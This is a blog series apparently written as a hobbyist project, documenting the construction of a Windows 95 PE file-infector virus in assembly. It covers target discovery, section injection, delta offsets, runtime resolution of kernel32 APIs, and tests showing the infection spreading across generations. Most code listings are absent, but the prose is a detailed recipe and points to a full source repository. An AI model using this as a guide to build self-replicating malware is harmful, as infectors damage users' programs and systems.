Monday, 22 April 2019

Using Win95 kernel32.dll exports like a virus.

Welcome back! If this is your first visit to VeXation you may want to start by reading about the project, the development environment, the work in progress PE infector virus, or the previous post on delta offsets.

Continued Recap

At the end of the last post I completed `pijector`, an updated version of `minijector`. `pijector` is a PE executable file infector virus that can add its code to `.exe` files found in the same directory by adding a new section to the infected target. The injected code is self-contained and position independent.

There are two big shortcomings with `pijector` that prevent it from being a functional virus. In generation 1+:
  1. The way the virus code uses Win32 API functions will not work - a layer of indirection was broken and the first API function call will crash.
  2. The original entrypoint of the infected program is never called. The host program is effectively broken by the infection.
Today I'll describe how I worked through solving the Win32 API problems. With that out of the way I'll be in a good position to describe how I handled the original entrypoint problem in a future post.

Let's jump right in!

Understanding the problem

To understand why the Win32 API function invocations in the `pijector` virus code were broken I started by comparing the execution of generation 0 and generation 1 in a debugger. By carefully stepping through the first win32 function call in the virus code in both generations and comparing the results I was able to build a picture of the problem.

Generation 0

I started by running the generation 0 `pijector.exe` in `td32` and switching to the CPU view.


The first Win32 API function the `pijector` virus code uses is `FindFirstFileA` exported from `C:\windows\system\kernel32.dll`.

In the source code it looks like:

In the disassembly view it looks like:

I was expecting that the call target would be a memory address somewhere in the `kernel32.dll` address space but the disassembly shows a target inside of `pijector`'s address space. Already the debugger is challenging my assumptions!

Seeing a call to an unknown address the first question I have is "what code is at `0x0040165C`"? One way to check that in `td32` is to "follow" the `call` by right clicking the line and choosing "Follow".


Now `td32` shows:

So the call takes the debugger to a `jmp` instruction to the address specified at `0x00403060`. Choosing "Data" in the `td32` menu followed by "Inspect" pops up a window that I used to quickly peek at what address the `jmp` will go to before following it.



Entering `[00403060]` as the expression (just like in the disassembly) shows the `dword` hex value:

That looks more like what I was expecting initially: an address in `kernel32.dll`. Following the `jmp [00403060]` instruction confirms the debugger does end up in the `kernel32.dll` address space.


Now the disassembly shows:

Very interesting! It's already pretty clear that there is some indirection between the virus code's `call`s to Win32 APIs and how control eventually ends up in the `kernel32.dll` address space.

Some of the addresses from this debugging experiment make more sense when compared with `tdump` output of both `pijector` and `kernel32.dll`.

First, the `jmp [00403060]` instruction is interesting because the `tdump` of `pijector` shows that `0x00403060` is in the `.idata` section.

I could tell this quickly because subtracting the base address of `pijector.exe` (`0x00400000`) from the address in the `jmp` reference (`0x00403060`) gives `0x00003060`. Since `0x00003060` is larger than `0x00003000` (which is the `RVA` of the `.idata` section) and smaller than `0x00004000` (which is the `RVA` of the `.reloc` section) the pointer that's used for the `jmp` target must be in `.idata`.

The `push BFF77A18` instruction that `jmp [00403060]` brings execution to is interesting when matched up to a `tdump` of `C:\windows\sytem\kernel32.dll`. (Isn't it handy that `tdump` works with `.dlls` too?)

In my `kernel32.dll`'s exports the `FindFirstFileA` function appears like so:

It has ordinal number 249 and the RVA `0x00007a18`. Adding the `kernel32.dll` base address `0xBFF70000` (more on finding that later) to the `FindFirstFileA` RVA gives  `0xBFF77A18` - the argument from the `push` instruction!

What does it all mean? In summary:
  • `call FindFirstFileA` in generation 0 doesn't immediately call into `kernel32.dll` code.
  • instead it calls a local address that `jmp`s to a memory address specified in a pointer in the `.idata` section
  • the `jmp` takes execution into `kernel32.dll` where the exported `FindFirstFileA` function address gets pushed.
(note: Some of the above is specific to `tasm32``/tlink32` but in general it works similarly for other assemblers/linkers).

Why so much indirection? One reason is it lets the operating system loader populate the `.idata` section with pointers to imported `kernel32.dll` functions without having to update each individual places in the code sections that call the imported functions.

(note: For a more rigorous explanation of these mechanisms see the "Peering inside the PE" MSDN article, particularly PE file Imports and PE File Exports)

Now that I have seen how the API function invocation works in generation 0 it was time to turn to the generation 1 code that crashes. Ignoring any other resources it's possible to start to see the problem based on what's known from stepping through generation 0. The indirection I saw relied on pointers in an `.idata` section but the virus code only creates one new `.ireloc` section in the target, nothing carries forward or corrects for the missing `.idata` pointers. I used the same process of following an API call in `td32` with the generation 1 `calc.exe` to verify that idea.

Generation 1

Loading the infected generation 1 `calc.exe` in `td32` I saw the `call FindFirstFileA` Win32 API function call in the virus code a few instructions from the top, after the delta offset calculation. Similar to the Generation 0 disassembly the function call is a `call` to a memory address inside of `calc.exe`'s address space.


In generation 0 the disassembly was:

In generation 1 the disassembly is:

The difference in address (`0x0040165C` vs `0x0041365C`) is explained by the location of the code. In both cases the `call`'s relative target was `0x0000065C` but the location of the `call` itself differed.

In generation 0 the executable's base address was `0x00400000` and the `CODE` section's RVA was `0x00001000`. If I add the base address, the section RVA, and the relative target I get the generation 0 call target: `0x00400000` + `0x00001000` + `0x0000065C` = `0x0040165C`.

In generation 1 the executable's base address was still `0x00400000` but the `.ireloc` section that the `call` instruction is in has an RVA of `0x00013000`. If I add the base address, the section RVA, and the relative target again I get the generation 1 call target: `0x00400000` + `0x00013000` + `0x0000065C` = `0x0041365C`.

So far execution has looked the same. Moving on to following the `call` will answer the question "What code is at `0x0041365C` in `calc.exe`?".


The disassembly shows a `jmp` instruction and its target (`[00403060]`) looks the same as in generation 0. So far so good.

Using the data inspector window again the address at `[00403060]` for the `jmp` target can be checked:

This time it shows a DWORD with the hex value:

This address looks totally wrong and it isn't the same target that Generation 0 jumped to. A smoking gun!

Letting the debugger follow the `jmp [CALC.00403060]` instruction sends it to la-la land.



The `jmp` causes an access violation and `calc.exe` crashes shortly after.

What to do?

It's clear the indirection used by generation 0 is a problem in generation 1+. The target of the `jmp` in the indirected `kernel32.dll` API call is read from an address that only made sense in generation 0. Similar to the problem of variable references across multiple sections that I tacked in the delta offset post the easiest solution is one of simplification: stop using the system loader to resolve `kernel32.dll` function references and stop relying on pointers in the `.idata` section (or equivalent for other assemblers).

Hard-coding

The earliest win32 viruses avoided the system loader by hard-coding the addresses of the DLL functions they used. Imagine if instead of using `call FindFirstFileA` the `pijector` code instead used `call 0xBFF77A18`. As long as the `kernel32.dll` export for `FindFirstFileA` was _always_ at RVA `0x00007A18` and `kernel32.dll` was _always_ loaded at `0xBFF70000` this would be smooth sailing. Of course in practice all of these things change. Sometimes two matching Windows versions with different locales can have differences that would break these assumptions!

DIY

Another way to approach this problem (and the route I chose) is to have the virus code act like its own little linker/loader and find the addresses of the DLL functions required at runtime. This turns out to be a fun way to get some hands on experience playing with concepts from dynamic linking and operating system loaders.

In Windows dynamic linking is the domain of Dynamic Link Libraries (DLLs). The best part is that DLLs are implemented as PE executables! Having already written x86 ASM for manipulating PE metadata its straight forwad to get right into working with the `kernel32` DLL. That's also the reason that the trusty `tdump` tool has no problem with DLLs.

There's one other handy Windows trick that the virus code can use to do its runtime linking of external DLL functions: `kernel32.GetProcAddress`. This is an exported function from `kernel32.dll` that finds the address of an exported DLL function given its name and the DLL's base address.

That presents a nice short-cut. All the virus has to do is somehow find `kernel32.dll` and the address of the `GetProcAddress` function and from there its easy to find any other required API addresses in a way that won't rely on the `.idata` section or any hardcoded offsets.

Exploring the solution

Since the task of finding win32 API function addresses from `kernel32.dll` at runtime is fairly self-contained I decided to start by experimenting with a stand-alone program separate from the PE infector virus code. Once I had a good solution I integrated it back into the virus code.

I decided to call the standalone program `apifind` since that's what it was going to do. At a high level the `apifind` code:

  1. Finds the `kernel32.dll`'s base address
  2. Finds `kernel32.dll`'s `IMAGE_EXPORT_DIRECTORY` structure
  3. Finds the index of `GetProcAddress` in `IMAGE_EXPORT_DIRECTORY.AddressOfNames`
  4. Uses the index to find the `GetProcAddress` ordinal in `IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals`.
  5. Uses the ordinal of `GetProcAddress` to find the export RVA in `IMAGE_EXPORT_DIRECTORY.AddressOfFunctions`
  6. Uses the discovered RVA of `GetProcAddress` to find other required APIs (e.g. `kernel32.FindFirstFileA`.

The code for `apifind` is available in the VeXation Github repo.

Where's kernel32.dll?

The first thing `apifind` needs to do is find the base address where `kernel32.dll` is loaded.

If you're familiar with more modern (Windows 2000/NT+) malware you might know of a trick for this based on chasing pointers from the Process Environment Block (PEB) to a list of loaded modules. On Windows 2000/NT/XP `kernel32.dll`'s location in this list was predictable and so offered a reliable way to find the base address dynamically. Since I'm targeting Windows 95 it's totally not applicable and another approach needs to be taken.

The "trick" I used instead is an old one. The first reference I saw was in 29A issue 04 from 1999 and an article by "LethalMind" called "RETRIEVING API'S ADRESSES". I suspect the trick predates this article as well. (Can you even call it a "trick"? On some level it's just The Way Things Work).

The core idea is to take advantage of the fact that it's `kernel32.dll` that calls every program's entrypoint when it is first started by the operating system. More specifically it's the `kernel32.dll`'s `CreateProcess` function that calls the program's entrypoint. Since the virus code replaces the infected program's original entrypoint I know that at the start of the virus code's execution the return address on the top of the stack will be pointing back into `kernel32.dll` somewhere.

Since `kernel32.dll` is a DLL and DLLs are portable executables I know what the start of `kernel32.dll` will look like: It should have a DOS header with the magic `MZ` bytes. Further, I know it will be section aligned in memory. All of that PE knowledge from previous articles really comes in handy! :-)

Using the return address from the stack the virus code can search backwards by the size of a section, looking for the DOS header magic bytes. When it finds a section aligned address that has the expected header it will be the base address of `kernel32.dll`.

One disadvantage of this technique is that it only works if the virus code is executed before the host program code. If the real program is run first then the state of the stack will be unpredictable. I might have to revisit this strategy in the future if I mess around with more sophisticated entrypoint obfuscation but for now it will work reliably.

DLL Exports

Knowing the base address of where `kernel32.dll` is loaded lets me move on to `apifind`'s next challenge: finding the `GetProcAddress` function export in `kernel32.dll`.

The PE format is responsible for describing how a DLL exports a function for consumption by another program. The "Peering inside PE" article's section on "PE File Exports" was an invaluable resource for understanding PE exports.

To summarize, `kernel32.dll` has an `IMAGE_EXPORT_DIRECTORY` structure that is predictably located (it's always the first data directory after the section table of the PE structure). Inside of the `IMAGE_EXPORT_DIRECTORY` structure are pointers to three arrays:

  1. `AddressOfFunctions` - which holds pointers to the RVA of each exported DLL function.
  2. `AddressOfNames` - which holds pointers to the null terminated name of each exported DLL function.
  3. `AddressOfNameOrdinals` - which holds the ordinal (think ID number?) of each exported DLL function.

All three arrays have the same number of entries and can be accessed in parallel. That is, if I can find the index of a specific function name in `AddressOfNames` I can use that index to find the ordinal in `AddressOfNameOrdinals` and then the function pointer in `AddressOfFunctions` using the ordinal.

The x86 assembly that accomplishes the above is a little bit gnarly but I did my best to comment it thoroughly. At a high level the code:

  1. Finds the `kernel32.dll` `IMAGE_EXPORT_DIRECTORY` structure.
  2. Loops through `AddressOfNames` to find the entry matching `"GetProcAddress\0"`
  3. Uses the matching offset in `AddressOfNames` to find the ordinal for `GetProcAddress` in `AddressOfNameOrdinals`
  4. Uses the ordinal for `GetProcAddress` to find the memory address of the exported function in `AddressOfFunctions`.

Once the address of the `GetProcAddress` function from `kernel32.dll` is known the fun can really begin.


Link it yourself

The virus code from `pijector` uses a handful of `kernel32.dll` functions (`FindFirstFileA`, `FindNextFileA`, `lstrcpy`, `CreateFileA`, etc). Using `GetProcAddress` makes for an easy way to find the address of each without needing to do as much work spelunking the `kernel32.dll` export table.

To find the address of `FindFirstFileA` the `apifind.asm` code uses the discovered `GetProcAddress` address (held in a var `GetProcAddress`):

For every function the virus wants to "link" it needs two things:

  1. The name of the API in a null terminated string (e.g. `szFindFirstFileA` above holds "FindFirstFileA\0").
  2. A four byte var to hold the function pointer (e.g. `FindFirstFileA` above)

I chose the most naive solution for the first part and included the literal strings in the virus code. That's an obvious tell for AV since the virus code will now have function name strings like `"GetProcAddress\0"`,`"FindFirstFileA\0"` embedded in each infected file that aren't present in the file's PE imports. There are lots of various tricks for working around this but for now I'm ignoring AV "stealth".

One of the other challenges I encountered was finding a way to use raw function pointers with TASM while still having it handle the `stdcall` calling convention and argument checking. The solution to this was adding explicit `PROCDESC` types to reference for each `call` of a raw pointer.

You might notice that weird `call` syntax in the fragment above. It relies on a `procGetProcAddress` `PROCDESC`. In brief `PROCDESC` is a bit of TASM syntax that lets me give the assembler a description of the function I'm calling so it can use the correct calling convention and check the arguments. For `GetProcAddress` the `procGetProcAddress` `PROCDESC` looks like:

It indicates that the `stdcall` calling convention should be used and there are two `DWORD` arguments: the base address of a DLL and a pointer to the name of the exported function to lookup.

The `apifind.asm` code uses a similar `PROCDESC` to invoke the `kernel32.FindFirstFileA` function by the address found with `GetProcAddress`:

End-to-end this is certainly more verbose than the simple `call <api>` that normal programs can get away with but virus code is "special" ;-D

Convenient Macros

Tackling the clunkyness was my next task. I decided it made sense to write some quick macros that would make it easier to find required API addresses and invoke them. Borland's Macro language is pretty powerful and I was able to get some decent results quickly even as a complete assembly language programming novice.

To make it easy to see how the macros replaced the initial code I made a separate `apifind2` project that took the code from `apifind` and introduced some new macros.

I created four macros, each addressing one of the four parts involved in the process of using an exported DLL function resolved by the virus at runtime:
  1. Making a name variable and a pointer variable for each API.
  2. Describing the API procedure and its arguments.
  3. Populating the pointer variable by finding the name.
  4. Invoking the described procedure using the pointer.

REQUIRED_API

The macro I wrote for declaring a name variable and a pointer variable for each API is called `REQUIRED_API`:


DESC_RUNTIME_API

The macro I wrote for generating a `PROCDESC` for each API is called `DESC_RUNTIME_API`:


LINK_API

The macro I wrote to find the `kernel32.dll` function address for a `REQUIRED_API` is called `LINK_API`:


CALL_RUNTIME_API

The last macro is the one used to invoke functions previously described with `DESC_RUNTIME_API` and declared with `REQUIRED_API`. The `LINK_API` macro uses `CALL_RUNTIME_API` to call `GetProcAddress`.


Next Steps

With `apifind` and `apifind2` I have an effective way to find `kernel32.dll` and its exported functions at runtime without hard-coding anything. The next step is to take this code and integrate it back into the `pijector` virus code.

For this I created a project called `apisafejector`. Like the other projects so far its code is available in the VeXation repo.

I was able to use the code/macros from `apifind2` for `apisafejector` as-is with one small exception: all of the variable references needed to be adjusted to use the delta offset.

For each of the Win32 APIs used by `pijector` the `apisafejector` code needed:
  1. a `DESC_RUNTIME_API` line. See `apisafejector.inc` for these.
  2. a `REQUIRED_API` line. See the bottom of `apisafejector.asm` for these.
  3. a `LINK_API` line. See the `@@linkapis` label in `apisafejector.asm`.

After these three pieces were in place I updated each of the existing `call <win32 api function>` instructions to use `CALL_RUNTIME_API <win32 api function>, <args>` instead.

A virus at last!

It's finally time to see if the virus code can propagate itself beyond the first generation. To test the updated `apisafejector` virus I started by infecting `calc.exe` by using the `Makefile`'s run target with a clean build (without debug symbols):



This launched `apisafejector.exe` in `td32` (remember it's a necessary hack to run the generation 0 executable this way or it will crash writing to a read-only section). Hitting `F9` let it complete its work infecting the only other `.exe` in the directory that can be opened for writing, `calc.exe`. The `apisafejector.exe` process terminated normally once it was complete.


I verified `calc.exe` was infected by checking the `tdump calc.exe` output to see that the entrypoint was updated and that there was a new `.ireloc` section added.

Before `tdump calc.exe` showed:

After:

Since the virus only infects `*.exe` files in the same directory it's easy to make a little test lab to see if the first generation `calc.exe` infection is working. I simply made a new directory, copied in the infected `calc.exe` and then copied in a clean `cdplayer.exe` from the Windows directory.

Running `calc.exe` in this directory appears to do nothing: since the virus code doesn't call the original `calc.exe` entrypoint yet the program immediately exits after infecting `cdplayer.exe` and without showing any actual calculator GUI.

Checking the `tdump` output from `cdplayer.exe` shows that while it seemed like `calc.exe` exited without doing anything the infection did work! The entrypoint of `cdplayer.exe ` was changed and a new `.ireloc` section was added. The generation 1 `calc.exe` managed to successfully create a generation 2 infection in `cdplayer.exe`!

Before running the infected `calc.exe` `tdump cdplayer.exe` showed:

After it showed:

To ensure this wasn't a fluke I tried making one more test directory to see if the generation 2 infection in `cdplayer.exe` could propagate.

Running the infected `cdplayer.exe` gave the same results as `calc.exe`. The program exited immediately and the `tdump` output for the `pbrush.exe` program shows the tell-tale signs of infection. Generation 2 successfully propagated to generation 3 in `pbrush.exe`!

Before running `cdplayer.exe` `tdump pbrush.exe` showed:

After it showed:

I have to admit I took particular joy in corrupting my favourite Windows utilities one by one.

Conclusion

With `apisafejector` I've arrived at a from-scratch Borland Turbo Assembler PE infector virus that actually propagates itself. The last remaining challenge before a rough prototype of the core virus is complete is finding a way to invoke the infected program's original code. If all of the infected programs appear to be broken then the virus certainly won't evade detection for long.

I hope presenting my progress and general piece-wise development approach is interesting! I've only scratched the surface of what's possible and implemented the most basic techniques to keep making forward progress. I'm excited to gradually improve on the skeleton established so far. If nothing else this project has emphasized for me the difference between knowing how to do something in theory and actually doing it in practice :-)

In general it seems like I manage ~one post a month so I hope to see you in May for the next VeXation installment. As always, I would love to hear feedback about this project. Feel free to drop me a line on twitter (@cpu) or by email (daniel@binaryparadox.net).

Monday, 11 March 2019

A VXer's Best Friend: the Delta Offset

Welcome back! If this is your first visit to VeXation you may want to start by reading about the project, the development environment, or the work in progress PE infector virus I'm extending.

Recap

At the end of the last post I completed minijector, a Windows 95 PE executable file infector virus that can add its code to .exe files found in the same directory by adding a new section to the infected target. There are a handful of shortcomings that prevent minijector from being a real functional virus. To recap, the virus code quickly falls apart for generations after 0:

  1. The virus code relies on a data section that isn't copied into the infected program. Variable references will all be broken.
  2. The way the virus code uses Win32 API functions will not work - a layer of indirection was broken and the first API function call will crash.
  3. The virus code is inert. The entrypoints of infected programs aren't being updated.

Today I'll describe the approach I took to fix the first of these three problems: making the virus self-contained and position independent.

Code and Data

A big problem with Minijector is that its CODE section refers to variables in a separate DATA section. When Minijector's code is copied into generation 1+ all of the variables are left behind and the references will be invalid!

I found it helpful to get an intuition for this using tdump on the minijector.exe executable.


Here I can see there's both a CODE and a DATA section present in the object table and that each of those section has a non-zero PhysSize.

(Side note: The names of these sections is a give-away that I used Borland Turbo Assembler. Other assemblers will choose different names. For example, calc.exe has a .text section instead of CODE).

Turning to a tdump of a calc.exe instance infected by minijector.exe I can see there's just one new section above and beyond the original calc.exe sections, .ireloc:


Since the virus code was using both sections (CODE and DATA) in the original minijector.exe and there's only one new section in calc.exe (.ireloc) it's easy to understand there is a mismatch that needs to be addressed.

Code is Data is Code

It's tempting to think about fixing this problem by duplicating the process generation 0 uses to copy its CODE section to the injected .ireloc section. Overall this approach seemed like the wrong solution. It will be more complex managing injecting multiple sections and as mentioned in the previous post adding a new section is already pretty clumsy from an AV evasion perspective. Continuing to pile new sections into a target isn't very appealing.

The route I decided to follow was to remove the DATA section entirely and have the virus maintain and update variables inside of its existing CODE section. I started by copying the minijector folder from the VeXation repo to create a pijector folder (position independent (in)jector, get it?). Updating all of the old "minijector" references in the Makefile, .inc, .def, and .asm files was enough to get started on a position independent version of minijector.

From an Assembly programming standpoint there's only one change that needs to be made. The old .data section from minijector.asm is moved inside of the .code section of pijector.asm. Done!

For unsatisfying and vague reasons I found I couldn't delete the .data section outright or tasm32 and tlink32 would wig out and create a generation 0 binary that would crash immediately. Rather than spend time figuring out why I decided to hack around it by adding a tiny .data section that isn't used for anything:


With the old .data section moved to .code and replaced with an empty .data section the assembled pijector.exe should have a non-empty CODE section and an empty DATA section on disk. A quick tdump shows that this worked out as expected:


Unlike before the PhysSize of the DATA section is now 00000000.

The trap of position dependence

Consolidating to one section is a step in the right direction but it's only a half-solution for making sure the virus code from generation 0 still works when run from a new location in generation 1+.

I found it was easier to understand the remaining problem by poking at it with some tools. Running td32 on an old minijector.exe build without debug symbols makes it easy to see how variable references in the code end up looking in the assembled executable.

There's an example of variables being used right at the beginning of the minijector.asm code that shows the problem in concrete terms:


Here eax and ebx are being used as arguments to FindFirstFileA. Both arguments are a pointer to a memory address. In this case pointers to the memory addresses of the variables infectFilter and findData respectively. After calling FindFirstFileA the result in the eax register is saved in the findHandle variable.

In td32 the debugger's view of this code's disassembly looks a little bit different. Most importantly the "offset infectFilter", "offset findData" and "[findHandle]" instances have been replaced with memory addresses:


The addresses of the variables are offsets from where the OS loaded minijector.exe in memory, the base address.

In this case the base address is 0x00400000 and the infectFilter variable is at an offset of 0x14E6, the findData variable is at an offset of 0x13A8 and the findHandle variable is at an offset of 0x13A4.

(Side Note: You can also see the stdcall calling convention in action here. The assembler helpfully replaced the arguments to the call instruction with push operations in the correct reversed order)

Debugging pijector.exe to see variable reference offsets

The "infectFilter", "findData" and "findHandle" offsets work correctly in generation 0 because the assembler and linker calculated them knowing where the CODE section will be relative to the loaded base address.

The same offsets will be a complete disaster in later generations because the virus code from the generation 0 CODE section won't be located in the expected place anymore (the first section in the executable). Instead it will be running from the .ireloc section that gets appended at the end of infected executables.

For example if the findfirst code from above were injected into calc.exe the offset for the infectFilter variable (0x14E6) would be pointing somewhere inside calc.exe's original code in the .text section and not at the location of the infection filter variable in the virus code. That's obviously not going to work so what can be done?

Enter, the Δ offset

The solution to this problem is a well known trick in the VX and AV community called "the delta offset".

The core idea is to figure out at runtime the difference in location between where the virus code was originally being run in generation 0, and the location where the virus code is currently running in an infected executable. The difference in location is the delta offset and by adding it to all of the original variable offsets in the virus code they will remain correct even when the code is moved to a new location.

Calculating the delta offset

There are a handful of different ways to compute a delta offset but the standard textbook approach is to exploit the relative nature of "call" and its effect on the stack. Here's an example:


How does this magic incantation work? Well, there's a lot going on in just ~4 lines of assembly so let's break it down.

The first "call" is to a locally scoped label ("@@delta") for the address immediately after the "call" instruction. When the "call" instruction is executed the return address (the address of the instruction after "call") will be pushed onto the top of the stack as a side-effect of how "call" works.

In this case however we don't care about returning from a procedure call, we just want to know where this code is executing from in memory. A "pop" of the top of the stack into "ebp" puts the return address from the "call" instruction that was just executed into "ebp" (recall that the return address will be the address of the instruction after the "call", the "pop ebp" instruction).

Now comes the last trick: subtracting the original label offset ("offset @@delta") from the address of the "pop ebp" instruction (currently in "ebp"). This gives the difference between where the "pop ebp" instruction would have been in generation 0 and wherever the "pop ebp" instruction happens to be now: the delta offset!

Using the delta offset

I used "ebp" to hold the delta offset in the above snippet and in my virus code so to rewrite the original findfirst snippet to be position independent means going from something like:


to an updated version that takes into account the delta offset in `ebp` for each variable reference:


In pijector.asm I rewrote all of the original minijector.asm variable references following the same process shown above. Now the virus code and variables are self-contained in the DATA section and the variable references are position independent thanks to the delta offset!

Patching the target entrypoint

In order to see the delta offset calculation in action it's handy to have executables infected by generation 0 actually run the virus code when the infected executable is started.

In future posts I'll cover how to do this correctly so that when the virus code is finished doing its dirty work it can return execution to the infected program's original entry point. For now because the virus code is still incomplete I can update the entry point to jump to the virus code and not worry about anything else. The infected programs will be broken but that's fine for now.

To get the virus code to be executed by the infected program I updated pijector.asm to set the entry point of the target executable to the starting virtual address of the .ireloc segment.

Complete Assembly Code

The complete pijector assembly code is available in the VeXation github repo in the pijector folder.

Like with Minijector the code can be built by running "make" in the pijector directory. Or "make -DDEBUG" to build with debug symbols. "make run" will copy a clean calc.exe into the directory and start pijector.exe in Borland Turbo Debugger. That will let you step through infecting calc.exe. Remember that after being infected calc.exe will be broken because the virus isn't complete yet but the entry-point was changed.

Observing the delta offset in action

The delta offset is confusing to reason about statically. I found it much easier to understand when I could step through generation 0's calculation and compare it to generation 1's calculation. Here's a brief run through of how I did that.

First I ran "make clean" and "make -DDEBUG" in the pijector directory to get a debug build. Then I ran "make run" to step through generation 0 in the debugger.

For this task I found it useful to use the "CPU" view instead of the source view so I clicked "View" then "CPU" and then maximized the CPU view window.

Generation 0


Debugging pijector.exe in CPU view

After the debugger loads execution is paused on the first part of the delta offset calculation at address 0x00401000. In the bottom right I can see the top of the stack is at address 0x0063FE3C and the value is 0xBFF88E93.

After stepping forward one instruction by pressing F8 the debugger will look as follows in the CPU view window:

One step into the pijector.exe delta offset calculation
Now the top of the stack is 0x0063FE38 and has the new value 0x00401005. I can cross-reference that with the primary disassembly view to see that 0x00401005 is the address of the "pop ebp" instruction, just as expected.

After stepping forward with F8 once more the debugger will look as follows:

Two steps into the pijector delta offset calculation

Now the virus code has popped the top of the stack into the "ebp" register and it holds the value "0x00401005". This value is the address of the "pop ebp" instruction, so far so good.

Finally by pressing F8 one last time the debugger will show the end of the delta offset calculation:

The end of the pijector delta offset calculation
Now "offset @@delta" has been subtracted from "ebp" and it's left holding the value 0x00000000.

Wait a second. All zero? Is that right?

Yes! Remember that this is generation 0 so the code is executing from the place the assembler/linker put it. All of the original offsets are correct as-is. The delta offset that needs to be applied is 0 and the calculation is correct.

After hitting F9 to continue execution the pejector.exe process will finish its work and terminate and I'm left with an infected calc.exe to repeat the process with.

Generation 1

Now that I have an infected generation 1 calc.exe I can see how its delta offset calculation produces a different result than generation 0.

Running "td32 calc.exe" loads the generation 1 program and pauses execution at a debugger screen like this (after dismissing the warning about missing symbols):

Debugging an infected calc.exe in CPU view

Right away I can use the debugger's output to see the entry point patching worked because the debugger is paused at 0x00413000 which is the base address of where calc.exe is loaded (0x00400000) plus the RVA of the .ireloc section shown in "tdump calc.exe" (0x00013000). The disassembly is also clearly the delta offset calculation from the virus code and not some part of the original calc.exe code.

Now I can follow the same process as before, single stepping with F8 and watching the delta offset calculation happen piece by piece. After one step forward the debugger view will look as follows:

One step into the calc.exe delta offset calculation
Like before the "call" instruction changed the top of the stack. Now the top of the stack is 0x0064FE38 and has the value 0x00413005. That's the address of the "pop ebp" instruction that follows the "call" in the disassembly view so the calculation appears the same as generation 0 so far.

Stepping forward once more with F8 gives the following view:

Two steps into the calc.exe delta offset calculation
Now "ebp" holds 0x00413005, the address of the "pop ebp" instruction after the "call". This still matches what happened in generation 0, no surprises so far.

One more step forward with F8 shows the critical difference in generation 1's delta offset calculation:

The end of the calc.exe delta offset calculation
After subtracting "offset @@delta" the "ebp" register is left with the value 0x00012000 and not 0x00000000. This value (0x00012000) is the generation 1 delta offset!

The easiest way to verify this is the correct delta offset for the calc.exe generation 1 infection is to compare the tdump of the generation 0 pijector.exe and the infected generation 1 calc.exe.



In the pijector.exe tdump output the CODE section is located at RVA 0x00001000. In the infected calc.exe the .ireloc section is located at RVA 0x00013000.

Taking 0x00013000 - 0x00001000 gives 0x00012000, the same delta offset that the generation 1 virus code calculated at runtime. Right-on! Now throughout this instance of the virus code variable references can be corrected for their current location by adding 0x00012000 to the original variable offset.

Closing notes

There is still one big problem left to address before pijector could be a real functional virus: the way the virus code uses Win32 API functions won't work in generations 1+.

If a program infected by pijector is run it will immediately crash at the first invocation of FindFirstFileA. Fixing this problem is going to take even more runtime contortions and I'll save that for the next post :-) It's a lot of work to make a functional virus!

Beyond that big problem there's also a smaller problem: the generation 0 pijector.exe binary will only work if its run under td32 or another debugger. The reason is fairly simple to understand: moving the old .data section into the .code section means the virus is writing to its own code and that's not what Borland Turbo Assembler expected.

When tasm32/tlink32 builds the generation 0 pijector.exe binary the CODE section it creates is marked "CER" (contains code, executable, readable). Notably it doesn't have the "W" flag for "writable". This is only a problem for generation 0 because every subsequent generation will have virus code located in a section that the previous generation of the virus created, not Borland, and the virus code always makes the sections it creates writable.

The generation 0 binary works correctly when run in td32 because it (and other debuggers) make the code section of the debugged program writable in order to be able to add breakpoints. One way to remove the dependence on using a debugger to run generation 0 is to write a small utility program that can edit generation 0's CODE section metadata after the executable is built to have the writable flag. I'm already strapped for time so for now I live with always running generation 0 in a debugger :-)

Thanks for sticking with me while I go on this VXing journey. As always, I would love to hear feedback about this project. Feel free to drop me a line on twitter (@cpu) or by email (daniel@binaryparadox.net).

Wednesday, 30 January 2019

PE File Infector Basics

Welcome back! If this is your first visit to VeXation you may want to start by reading about the project or the development environment I'm using. In this post I'll describe some of my experience starting on a Windows 95 file infector virus.

The first objective of a file infector is to add its own code to another file. In my case the files will be executables. The second objective of a file infector is to make sure the newly added virus code is run in addition to the original executable code. If the virus code isn't run it can't propagate to new executables. If the original executable code isn't run then the virus broke the program it infected and will probably be detected before spreading very far.

To make things manageable I started with the first objective: adding code to another executable. I prefer to work in small chunks where possible so I chose to break the task up as follows:
  1. Finding new target executables.
  2. Deciding if a target is suitable for infection.
  3. Adding a new section to the target with the correct size and metadata.
  4. Writing the virus code into the new section of the target.
As I introduce each topic at a high level I'll share some snippets of my assembly code so far. Towards the end I'll share the full assembly source code along with some pointers, and will share how I validated my work with some handy low level tools.

Generation 0

Initially it took me some time to wrap my head around "Generation 0" of a virus versus subsequent generations. I'm not certain if anyone else uses this "generation" terminology but it's what made sense to me.

Typically when you encounter a virus as an end user it's from running a benign program that was infected by a virus. Have you ever asked yourself how that program was infected? Chances are high that it was infected by another infected benign program. If you imagine tracing these infections backwards eventually there must have been a "Generation 1", the first benign executable infected by the virus.

How was the generation 1 program infected? The author of the virus must have conspired to do this using what I call "Generation 0" - a program built to bootstrap the infection process. Unlike "Generation n" there is no benign functionality in generation 0, it exists only to infect.

Having some terminology in mind was important because I found later on there were practical considerations to be made based on whether the code executing is generation 0 of the virus or a subsequent generation.

Finding target .EXEs

One of the classic problems of virus development is making sure that your creation doesn't escape the "lab" or destroy your development system. I imagine this was extra tricky before virtualization was easy. With the potential for disaster in mind I decided to start by only finding target executables to infect within the same directory as the generation 0 program. It isn't very difficult to recursively search other directories down the road.

This simple infection strategy also made development easier. For example I wrote my `Makefile`'s `run` target to copy a clean calc.exe from C:\Windows into the current directory before running the generation zero program. Everything is neatly contained in the working directory.

Finding target files requires using Win32 API functions. I found a copy of win32.hlp for Windows 95 that I use as my primary reference for the available Win32 APIs, their arguments and their return values. Pay particular attention to return values! Some API functions (e.g. FindNextFileA) return 0 for errors. Other API functions (e.g. FindFirstFileA) return something non-zero for errors (e.g. 0xFFFFFFFF for FindFirstFileA).

1995's API docs aren't so bad after all

To keep things simple I have been limiting my code to ASCII compatibility which means using the "A" variant of some win32 APIs (for ASCII) vs the "W" variant (for Wide Chars). Remember to drop the "A" suffix when looking up documentation (e.g. search for FindFirstFile in the win32.hlp index not FindFirstFileA). Assembly programmers have to care about "A" vs "W" where normally the Visual C++ runtime hides this distinction from programmers with compile time magic.

To find files in the current directory requires using a combination of FindFirstFileA and FindNextFileA. The first is used to start a directory traversal and the second is used to continue it. By providing a pointer to the null terminated string "*.exe" as the lpFileName I'm able to start a traversal of all executables (if any!) in the current directory.



Deciding if a target is suitable

This is another classic virus dilemma. Not all target programs are created equal and infecting the wrong program can be disastrous, breaking the target and making the infection inert.

What should be checked?

